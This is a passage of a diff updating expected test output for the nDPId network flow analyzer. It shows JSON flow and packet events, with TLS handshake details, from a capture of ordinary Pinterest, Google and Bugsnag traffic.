{"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.c
o.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinte
rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} 
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -68,70 +68,70 @@ 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} 
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} -00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b323